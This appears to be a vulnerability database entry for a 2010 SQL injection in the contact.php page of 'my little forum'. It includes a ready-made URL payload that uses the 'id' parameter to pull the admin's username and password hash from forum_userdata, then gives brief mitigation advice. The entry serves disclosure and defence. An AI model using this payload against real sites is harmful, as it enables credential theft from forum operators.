vendor:
my little forum
by:
Easy Laster
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: my little forum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
my little forum contact.php SQL Injection
A SQL injection vulnerability exists in the contact.php page of my little forum, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter. An example exploit is http://site.com/forum/contact.php?id=-11111111'+union+select+1,2,concat(user_name,0x3a,user_pw),4,5+from+forum_userdata+where+user_id=1--+
Mitigation:
Input validation should be used to prevent SQL injection attacks. Additionally, the application should use parameterized queries to prevent SQL injection.